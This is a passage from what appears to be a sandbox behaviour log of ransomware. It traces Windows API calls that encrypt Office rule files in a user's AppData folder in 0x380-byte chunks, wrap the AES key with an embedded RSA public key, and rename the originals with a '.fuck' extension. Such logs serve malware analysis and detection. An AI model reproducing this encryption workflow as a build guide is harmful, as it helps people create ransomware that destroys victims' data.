pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.556] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.556] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.557] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.557] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.557] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.557] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.557] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.558] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.558] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.558] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.559] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.559] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.559] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.559] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.561] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.561] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.561] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.562] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.562] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.562] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.562] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.566] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml"), bFailIfExists=0) returned 1 [0268.580] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0268.580] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml.gsg")) returned 1 [0268.585] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\excel.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\excel.exe_rules.xml.fuck")) returned 1 [0268.587] CryptDestroyHash (hHash=0x2e7fbc0) returned 1 [0268.587] CryptDestroyKey (hKey=0x2e7eb80) returned 1 [0268.587] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0268.587] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0268.587] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0268.587] GetLastError () returned 0x0 [0268.587] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml")) returned 0x20 [0268.588] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0268.589] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0268.590] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\msaccess.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0268.591] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\msaccess.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0268.592] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0268.595] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0268.595] lstrlenA (lpString="ENarQtORUWLZSNndbbyWVVoTzMlQm") returned 29 [0268.595] CryptHashData (hHash=0x2e7fbc0, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0268.595] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2e7fbc0, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2e7eb80) returned 1 [0268.595] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0268.596] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0268.596] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f266f8) returned 1 [0268.596] CryptImportPublicKeyInfo (in: hCryptProv=0x2f266f8, dwCertEncodingType=0x1, pInfo=0x2f30890*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f308c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f308c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2e7f8c0) returned 1 [0268.596] CryptEncrypt (in: hKey=0x2e7f8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0268.596] CryptEncrypt (in: hKey=0x2e7f8c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25df0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25df0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0268.596] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f25df0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25df0*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0268.597] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.632] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.632] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.643] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.644] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.644] CryptEncrypt (in: hKey=0x2e7eb80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0268.644] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0268.644] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, 